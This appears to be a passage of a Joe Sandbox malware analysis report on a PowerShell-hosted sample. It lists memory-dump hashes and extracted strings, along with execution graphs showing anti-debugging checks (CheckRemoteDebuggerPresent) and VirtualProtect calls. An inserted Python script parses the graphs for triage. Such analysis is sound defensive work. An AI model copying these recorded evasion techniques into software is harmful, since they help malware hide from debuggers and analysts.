                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction ID: b7e6e44e08465fbf712b8076f11592dfa8e95a24ddbb545f811cf567a320a972
                                                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction Fuzzy Hash: 8EE08C32B00018A78B0896A9D8504E9FBBADFCC360F14847ED90AAB340DA32691686E1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fc4ff1e98864594475c1207490ca4cab831da2fd096e82848a185ddc62685007
                                                                                          • Instruction ID: 1b103983c2225904d0a5d620bd540d6aaf3512d44bca6994508b3b3c3d42da32
                                                                                          • Opcode Fuzzy Hash: fc4ff1e98864594475c1207490ca4cab831da2fd096e82848a185ddc62685007
                                                                                          • Instruction Fuzzy Hash: C7E0EC39849119CFCB09DBA5E44A4FEBF38FF10315B1002AAD603D2690DA35498ACB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 802eb9098df4ce3cd8916d813a9de8660c96629b065ec6320cfc115728a429e7
                                                                                          • Instruction ID: 51effa2297e811150f27b5d604dd77df1a2020b3ee31553de0969b8604a1f124
                                                                                          • Opcode Fuzzy Hash: 802eb9098df4ce3cd8916d813a9de8660c96629b065ec6320cfc115728a429e7
                                                                                          • Instruction Fuzzy Hash: 77D0C7A57431251655A561BD16512FF45FF4BC429970542369A0BC7647ED28CC0643D2
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction ID: 614e2d37fa3c217e4662ae88352d12b8e3f74d9a51dd4072997f21d1a235a733
                                                                                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction Fuzzy Hash: 98D067B0D042099F8780EFADD94156EFBF4EB48300F6085BA8919E7301EB329A12CBD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 396455b3a3c97d84fb7ecb04b5e93ebe3061022a02cd6157d1bd8fdde51f2f81
                                                                                          • Instruction ID: a646afb78b383682faf5b142b2eec5f49225a11762ab9b7b94bd80ffa7c78232
                                                                                          • Opcode Fuzzy Hash: 396455b3a3c97d84fb7ecb04b5e93ebe3061022a02cd6157d1bd8fdde51f2f81
                                                                                          • Instruction Fuzzy Hash: 7CD06731C05119CBCB0DABA5E85B4BEBF78FF14301F504269DB17922A0EE351A5ACAC5
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d5f8f2e39e9a634382730aff8268b36b377faa0ef7e2d01825c537799943e7c7
                                                                                          • Instruction ID: 6616b095ee2ee3dd7b47a49e8de04c20749221dc7e4e5d7967b7057f1cb83471
                                                                                          • Opcode Fuzzy Hash: d5f8f2e39e9a634382730aff8268b36b377faa0ef7e2d01825c537799943e7c7
                                                                                          • Instruction Fuzzy Hash: 9BD01734A0920A8BCB18EFA5E84686EBFB8AB44300F004269DA49D3340EA345801CBC1
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f9eff77a2f1817733da317683f92a2d6e2524fe615cad9780c0f67ba1fef44eb
                                                                                          • Instruction ID: 1a6a4b5dc63554f4974232d6b65d07e33dab5f952929c7d9f425d9ad105a27c0
                                                                                          • Opcode Fuzzy Hash: f9eff77a2f1817733da317683f92a2d6e2524fe615cad9780c0f67ba1fef44eb
                                                                                          • Instruction Fuzzy Hash: 9ED012754493849BDB164F7494C89083F65AB02251B0408DCD8464A2A7C976C044CF00
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6cbed8a3914373d164d7eed41b1aab07d520e18063a7c562925548c16c6eb33c
                                                                                          • Instruction ID: 433bc7a7628262249bbed87eea1733dd9d3adfbd2d38e7f67250e94a6b0df6c0
                                                                                          • Opcode Fuzzy Hash: 6cbed8a3914373d164d7eed41b1aab07d520e18063a7c562925548c16c6eb33c
                                                                                          • Instruction Fuzzy Hash: 0EC04C759095904FEF49DA35896A7267B32A756601B0A819D808286854DD244006DA11
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3da6a90917eec73ff022b7428c0852d18bf466bbc8b97ad8f30787364fa09639
                                                                                          • Instruction ID: 88ea6655bf333b1a47c2532482cfec87370346e4dab0d0f8a03cdb0243447d9b
                                                                                          • Opcode Fuzzy Hash: 3da6a90917eec73ff022b7428c0852d18bf466bbc8b97ad8f30787364fa09639
                                                                                          • Instruction Fuzzy Hash: 65B092301497088FC2496F75A448819736DAB4061538008ACE80E0A2A78E76E884CA44
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 166eb40100b767039727876dd59c1b589896e25836259629544c3c3194d76e45
                                                                                          • Instruction ID: 8409278bec7055e1a9ce81f72878b2db873a7fbef9f9ba59f8b11b599b1061ea
                                                                                          • Opcode Fuzzy Hash: 166eb40100b767039727876dd59c1b589896e25836259629544c3c3194d76e45
                                                                                          • Instruction Fuzzy Hash: 06A002257533214AEB086F335A4927B3DDAABC05D2F4CC4B5F481C4195DE3DC1496615
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1954930567.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_72a0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq$$fq$l$l
                                                                                          • API String ID: 0-1448729859
                                                                                          • Opcode ID: 48ee3d37bd78bea2981755d982c4871bb34acf5b7c8d8c56d82b3a4a8aab26ce
                                                                                          • Instruction ID: 149753dc9a2b9f40c70ba57e290f08fcc93f5b44c127f1f99dd598d5204f62be
                                                                                          • Opcode Fuzzy Hash: 48ee3d37bd78bea2981755d982c4871bb34acf5b7c8d8c56d82b3a4a8aab26ce
                                                                                          • Instruction Fuzzy Hash: AFA147B2724356AFCB24DA78C801766BFA6AFC6710F1484ABE545CB293CB31CD41C7A1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ,jq$0omp$$fq$$fq$$fq$$fq$$fq$$fq
                                                                                          • API String ID: 0-3782670052
                                                                                          • Opcode ID: 517ed85412c2cdd413467349ee587454520d18da69b1f3b4c127bfe2a4940cd0
                                                                                          • Instruction ID: a07cc9785ee729322a5d780c06b92a7283871970d947e596547c8a96de5dea1a
                                                                                          • Opcode Fuzzy Hash: 517ed85412c2cdd413467349ee587454520d18da69b1f3b4c127bfe2a4940cd0
                                                                                          • Instruction Fuzzy Hash: B8414278344115CFCB29EB79D89557E3BBA7F8DB9032418AAD152CF3A2DE10CC409796
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0omp$0omp$0omp$`Qfq$$fq$$fq$$fq
                                                                                          • API String ID: 0-4019838557
                                                                                          • Opcode ID: c68c6464c019a2e5925c9578ac680d68a22423d7f9f491d5823aa2481b0314bc
                                                                                          • Instruction ID: 1b287f0e580d48d812264306f97493832c63957b4b3b7c4521585f1107c70ea4
                                                                                          • Opcode Fuzzy Hash: c68c6464c019a2e5925c9578ac680d68a22423d7f9f491d5823aa2481b0314bc
                                                                                          • Instruction Fuzzy Hash: E5E1E4747102108FDB24AB7DA86562E77F6AFC9B10B2544BAD906DF3A5EE30CC418792
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1954930567.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_72a0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$$fq$$fq$$fq$l$l
                                                                                          • API String ID: 0-1664963280
                                                                                          • Opcode ID: 319592fa282a9b644fda8bdd954242d54f7df42eae711d88a5f4a8cb805874e8
                                                                                          • Instruction ID: 1f6367371da083a7fee04fbacf15f20eba6d97504704a127fe59a94ca1d2c5c8
                                                                                          • Opcode Fuzzy Hash: 319592fa282a9b644fda8bdd954242d54f7df42eae711d88a5f4a8cb805874e8
                                                                                          • Instruction Fuzzy Hash: 8F5137F5724347AFCB25CA798811766BFA6AFC2710F2480ABD545CB243DB31C881C7A2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: 2e4d393e5eb1390909d3e6225ec64523f6da5ec972ba3042ff77ad0004be406d
                                                                                          • Instruction ID: 777d36b0ef1c0045b6a0af5ce056a88f971d7e01a93ee8e9c4e579c08da7fb44
                                                                                          • Opcode Fuzzy Hash: 2e4d393e5eb1390909d3e6225ec64523f6da5ec972ba3042ff77ad0004be406d
                                                                                          • Instruction Fuzzy Hash: 3EB1C874E016099FCB54DFA9D990A9EFBF2FF88304F108629E419AB345DB30A945CF91
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1914489445.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: da3576a1f224af271c996a98d34dddc3caf2ef3c9078daf7df014b9c135ddd9d
                                                                                          • Instruction ID: 222e4b57c311587e993aa34efbdb23bfe8d1127e77da70a5b21dbea72580075e
                                                                                          • Opcode Fuzzy Hash: da3576a1f224af271c996a98d34dddc3caf2ef3c9078daf7df014b9c135ddd9d
                                                                                          • Instruction Fuzzy Hash: 17B1B774E006099FCB54DFA9D980A9EFBF2FF48304F108629E419AB345DB30A945CF91
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1954930567.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_72a0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: tPfq$$fq$$fq$$fq
                                                                                          • API String ID: 0-3039766666
                                                                                          • Opcode ID: 871bb135faa50f6bee6bce604ecf38b87948f0877df2e6166e1a07d03585c94c
                                                                                          • Instruction ID: 1dd472833e5ad3225124e6ae33e4b57a349f078802151718777f3b552e3c23df
                                                                                          • Opcode Fuzzy Hash: 871bb135faa50f6bee6bce604ecf38b87948f0877df2e6166e1a07d03585c94c
                                                                                          • Instruction Fuzzy Hash: 193105B2619386AFC726CF348811AA57FB9AF46320F19419BE444CF2A3C635CD44C762
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1954930567.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_72a0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $fq$$fq$$fq$$fq
                                                                                          • API String ID: 0-2113499236
                                                                                          • Opcode ID: d606180cc5d668bb5accd738a78bf6d5b6e0748ab024f624ff484da24295918e
                                                                                          • Instruction ID: 80c9783bf52f519c31ff4dc87e131ea91eb2744d6185a7a87a651a7b1324b6a1
                                                                                          • Opcode Fuzzy Hash: d606180cc5d668bb5accd738a78bf6d5b6e0748ab024f624ff484da24295918e
                                                                                          • Instruction Fuzzy Hash: 582147B2730317BFDB38597F8801727BB9B9FC0715F24802AA509DB681ED75C8918361
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1954930567.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_72a0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$$fq$$fq
                                                                                          • API String ID: 0-2206495126
                                                                                          • Opcode ID: 2968c0f4e493e1f7bc3551e92f17ca236c8819180161c186282fe3e063da74e5
                                                                                          • Instruction ID: 20dcddfd06d37ed135cd45da4342ddedfdeacdbefd8d8ba588a02857de94319d
                                                                                          • Opcode Fuzzy Hash: 2968c0f4e493e1f7bc3551e92f17ca236c8819180161c186282fe3e063da74e5
                                                                                          • Instruction Fuzzy Hash: CD012B60B2D3829FC736166808216677FB66FC2310F1900DBD040CB293DB384D45C367

                                                                                          Execution Graph

                                                                                          Execution Coverage:10.4%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:24
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph (node: address [API] -> successors)
                                                                                          • 5081: 6412c50 -> 5082
                                                                                          • 5082: 6412c6e -> 5085
                                                                                          • 5085: 6412dd0 -> 5089, 5092
                                                                                          • 5089: 6412e08 -> 5090
                                                                                          • 5090: 6412e4c CheckRemoteDebuggerPresent -> 5091
                                                                                          • 5091: 6412e8e -> 5086
                                                                                          • 5092: 6412e02 -> 5093
                                                                                          • 5093: 6412e4c CheckRemoteDebuggerPresent -> 5094
                                                                                          • 5094: 6412e8e -> 5086
                                                                                          • 5086: 6412cbb
                                                                                          • 5077: 32f8b40 -> 5078
                                                                                          • 5078: 32f8b80 CloseHandle -> 5080
                                                                                          • 5080: 32f8bb1
                                                                                          • 5095: 32f0850 -> 5096, 5099, 5102
                                                                                          • 5096: 32f0859
                                                                                          • 5099: 32f34bd -> 5105
                                                                                          • 5105: 32f88c0 -> 5107
                                                                                          • 5107: 32f88d3 -> 5109
                                                                                          • 5109: 32f8970 -> 5110
                                                                                          • 5110: 32f89b8 VirtualProtect -> 5112
                                                                                          • 5112: 32f34d6
                                                                                          • 5102: 32f3be2 -> 5104
                                                                                          • 5104: 32f88c0 VirtualProtect -> 5103
                                                                                          • 5103: 32f3bf8

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph (block: address range [API / call target] -> successors)
                                                                                          • 0: 64d8c18-64d8c83, call 64d0040, call 64dbf28 -> 6
                                                                                          • 6: 64d8c89-64dbec4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %1K$(K1$9Gxv$9Gxv$=<R3${u(F$C\
                                                                                          • API String ID: 0-857792947
                                                                                          • Opcode ID: b363dcdde01199b11cd94f3b1cebc1adb7d54b08deb0031474eb074ab548101f
                                                                                          • Instruction ID: fd6bc494f9e0fd27575cd0b8196bb11918516f3916c412f1cdfda7cadbb2e77f
                                                                                          • Opcode Fuzzy Hash: b363dcdde01199b11cd94f3b1cebc1adb7d54b08deb0031474eb074ab548101f
                                                                                          • Instruction Fuzzy Hash: 4753FB78A01219CFDB64DF28C99569EBBB2FB8C701F5081E9D809A7354DB349E85CF90

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph (block: address range [API / call target] -> successors)
                                                                                          • 522: 64d4dc3 -> 523
                                                                                          • 523: 64d4dc7-64d4dc9 -> 524
                                                                                          • 524: 64d4dca-64d4dcd -> 525, 526
                                                                                          • 525: 64d4dce-64d4dd3 -> 526, 527, 528, 529, 530, 531, 532, 533, 534, 535, 536, 537, 538, 539
                                                                                          • 526: 64d4e59-64d4e67 -> 534, 552
                                                                                          • 527: 64d502c-64d503e -> 545
                                                                                          • 528: 64d4e2e-64d4e3a -> 524
                                                                                          • 529: 64d4eab-64d4ee5 -> 524
                                                                                          • 530: 64d4eea -> 551
                                                                                          • 531: 64d5040
                                                                                          • 532: 64d4f9d-64d4fcb -> 530, 564
                                                                                          • 533: 64d4e3c-64d4e4d -> 528, 554
                                                                                          • 534: 64d4f7f-64d4f8d -> 536, 555
                                                                                          • 535: 64d501e-64d5020 -> 531, 540
                                                                                          • 536: 64d4e79-64d4ea6 -> 524
                                                                                          • 537: 64d4fdb-64d4fee -> 541
                                                                                          • 538: 64d4dda-64d4e14 -> 524
                                                                                          • 539: 64d4e16-64d4e29 -> 541
                                                                                          • 540: 64d5022-64d502a -> 545
                                                                                          • 541: 64d4ff0-64d5002 -> 545
                                                                                          • 545: 64d500c-64d5015 -> 527, 553
                                                                                          • 551: 64d4ef6-64d4f7a -> 524
                                                                                          • 552: 64d4e6d-64d4e74 -> 523
                                                                                          • 553: 64d5017 -> 527, 531, 535
                                                                                          • 554: 64d4e4f-64d4e54 -> 524
                                                                                          • 555: 64d4f93-64d4f98 -> 524
                                                                                          • 564: 64d4fd1-64d4fd6 -> 524
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PHfq$`Qfq$`Qfq
                                                                                          • API String ID: 0-872445281
                                                                                          • Opcode ID: 9b2313d7dc3f2f3c4ba740fa33a9336af87a541bd33e2020d545e8a7a82f1f43
                                                                                          • Instruction ID: 94bf45ed8772aaf811f73d660a430dcc41ec5e649f5d92bf1316a7c098c1283e
                                                                                          • Opcode Fuzzy Hash: 9b2313d7dc3f2f3c4ba740fa33a9336af87a541bd33e2020d545e8a7a82f1f43
                                                                                          • Instruction Fuzzy Hash: DE519E74E01218CFDB658F64D8A4BADB7F1FB45300F40419AE40AA7399CF345E828F41
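The Execution Graph above and the control-flow graph of this function are emitted by Joe Sandbox as one flattened line of tokens, which is hard to triage by eye. The following is an added example (not Joe Sandbox code and not part of this report) that parses that text form and answers the two questions a practitioner asks first: which Windows APIs each root of the execution graph reaches (here CheckRemoteDebuggerPresent, CloseHandle and VirtualProtect), and which basic block has the most successors, the usual way to spot a switch-style dispatcher in a flattened method (whether block 525 is one here is not something the report states). The three graph strings are copied verbatim from this report; the token rules the parser applies (decimal node number, hex address or start-end range, optional `call <addr>` or API-name annotations, `a->b` edges) are inferred from those strings and are an assumption about the format, not a documented schema.

```python
# Added example, not Joe Sandbox code: parse the text form of this report's
# execution_graph / control_flow_graph dumps and query them. The token rules
# (decimal node number, hex address or start-end range, optional "call <addr>"
# or API-name annotations, "a->b" edges) are inferred from the strings below,
# which are copied from the report, and are an assumption about the format.
from collections import namedtuple

Node = namedtuple("Node", "node_id span annotations")  # span: "addr" or "start-end"
Graph = namedtuple("Graph", "kind nodes edges")        # nodes: {id: Node}, edges: [(src, dst)]

EXECUTION_GRAPH = (
    "execution_graph 5081 6412c50 5082 6412c6e 5081->5082 5085 6412dd0 5082->5085 5089 6412e08 "
    "5085->5089 5092 6412e02 5085->5092 5086 6412cbb 5090 6412e4c CheckRemoteDebuggerPresent "
    "5089->5090 5091 6412e8e 5090->5091 5091->5086 5093 6412e4c CheckRemoteDebuggerPresent "
    "5092->5093 5094 6412e8e 5093->5094 5094->5086 5077 32f8b40 5078 32f8b80 CloseHandle "
    "5077->5078 5080 32f8bb1 5078->5080 5095 32f0850 5096 32f0859 5095->5096 5099 32f34bd "
    "5095->5099 5102 32f3be2 5095->5102 5105 32f88c0 5099->5105 5104 32f88c0 VirtualProtect "
    "5102->5104 5103 32f3bf8 5104->5103 5107 32f88d3 5105->5107 5109 32f8970 5107->5109 "
    "5110 32f89b8 VirtualProtect 5109->5110 5112 32f34d6 5110->5112"
)
CFG_WITH_CALLS = "control_flow_graph 0 64d8c18-64d8c83 call 64d0040 call 64dbf28 6 64d8c89-64dbec4 0->6"
CONTROL_FLOW_GRAPH = (
    "control_flow_graph 522 64d4dc3 523 64d4dc7-64d4dc9 522->523 524 64d4dca-64d4dcd 523->524 "
    "525 64d4dce-64d4dd3 524->525 526 64d4e59-64d4e67 524->526 525->526 527 64d502c-64d503e "
    "525->527 528 64d4e2e-64d4e3a 525->528 529 64d4eab-64d4ee5 525->529 530 64d4eea 525->530 "
    "531 64d5040 525->531 532 64d4f9d-64d4fcb 525->532 533 64d4e3c-64d4e4d 525->533 "
    "534 64d4f7f-64d4f8d 525->534 535 64d501e-64d5020 525->535 536 64d4e79-64d4ea6 525->536 "
    "537 64d4fdb-64d4fee 525->537 538 64d4dda-64d4e14 525->538 539 64d4e16-64d4e29 525->539 "
    "526->534 552 64d4e6d-64d4e74 526->552 545 64d500c-64d5015 527->545 528->524 529->524 "
    "551 64d4ef6-64d4f7a 530->551 532->530 564 64d4fd1-64d4fd6 532->564 533->528 "
    "554 64d4e4f-64d4e54 533->554 534->536 555 64d4f93-64d4f98 534->555 535->531 "
    "540 64d5022-64d502a 535->540 536->524 541 64d4ff0-64d5002 537->541 538->524 539->541 "
    "540->545 541->545 545->527 553 64d5017 545->553 551->524 552->523 553->527 553->531 "
    "553->535 554->524 555->524 564->524"
)


def parse_graph(line):
    """Walk the whitespace-separated tokens with a small state machine."""
    tokens = line.split()
    graph = Graph(kind=tokens[0], nodes={}, edges=[])
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                            # edge "src->dst"
            src, dst = tok.split("->", 1)
            graph.edges.append((int(src), int(dst)))
            i += 1
            continue
        node_id, span = int(tok), tokens[i + 1]    # node number, then its address/range
        i += 2
        annotations = []
        # Annotations run until the next edge or the next (decimal) node number.
        while i < len(tokens) and "->" not in tokens[i] and not tokens[i].isdigit():
            if tokens[i] == "call":                # "call <target>" is two tokens
                annotations.append("call " + tokens[i + 1])
                i += 2
            else:                                  # bare token: an API name
                annotations.append(tokens[i])
                i += 1
        graph.nodes[node_id] = Node(node_id, span, tuple(annotations))
    for src, dst in graph.edges:                   # refuse a dump that references unknown nodes
        if src not in graph.nodes or dst not in graph.nodes:
            raise ValueError(f"edge {src}->{dst} references an undefined node")
    return graph


def successors(graph):
    succ = {n: [] for n in graph.nodes}
    for src, dst in graph.edges:
        succ[src].append(dst)
    return succ


def roots(graph):
    """Nodes with no incoming edge: the entry point of each chain."""
    targets = {dst for _, dst in graph.edges}
    return sorted(n for n in graph.nodes if n not in targets)


def reachable_apis(graph, start):
    """API names on any node reachable from start (depth-first, cycle-safe)."""
    succ, seen, stack, apis = successors(graph), set(), [start], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        apis.update(a for a in graph.nodes[n].annotations if not a.startswith("call "))
        stack.extend(succ[n])
    return apis


def dispatcher(graph):
    """Node with the most successors, and that count."""
    succ = successors(graph)
    node_id = max(succ, key=lambda n: len(succ[n]))
    return node_id, len(succ[node_id])


if __name__ == "__main__":
    eg = parse_graph(EXECUTION_GRAPH)
    for r in roots(eg):
        print(f"root {r} @ {eg.nodes[r].span}: {sorted(reachable_apis(eg, r))}")
    cfg = parse_graph(CONTROL_FLOW_GRAPH)
    print(f"{cfg.kind}: {len(cfg.nodes)} blocks, widest dispatch {dispatcher(cfg)}")
```

Running it lists the three execution-graph roots (5077, 5081, 5095) with the APIs they reach, and reports that the control-flow graph has 27 blocks of which block 525 fans out to 14 successors. The node count it returns for the execution graph (24) matches the report's "Total number of Nodes", which is a cheap sanity check that the tokeniser has not mis-split a line.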

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph (block: address range [API / call target] -> successors)
                                                                                          • 767: 6412e02-6412e8c, CheckRemoteDebuggerPresent -> 769, 770
                                                                                          • 770: 6412e8e-6412e94 -> 769
                                                                                          • 769: 6412e95-6412ed0
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 06412E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2309772689.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_6410000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: c98871ba4434edf8f106003a35bf6bc53a6632f6d831263fc3d58b6116e77fa7
                                                                                          • Instruction ID: 0bd4fd5e2a13709e32cef6606f20b965167f2c1e9d87279da83cf43351cfb224
                                                                                          • Opcode Fuzzy Hash: c98871ba4434edf8f106003a35bf6bc53a6632f6d831263fc3d58b6116e77fa7
                                                                                          • Instruction Fuzzy Hash: 8A214AB5C012598FCB10CFA9D585BEEBBF4AF48310F14845AE459E7341D3789A44CF61

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph (block: address range [API / call target] -> successors)
                                                                                          • 773: 6412e08-6412e8c, CheckRemoteDebuggerPresent -> 775, 776
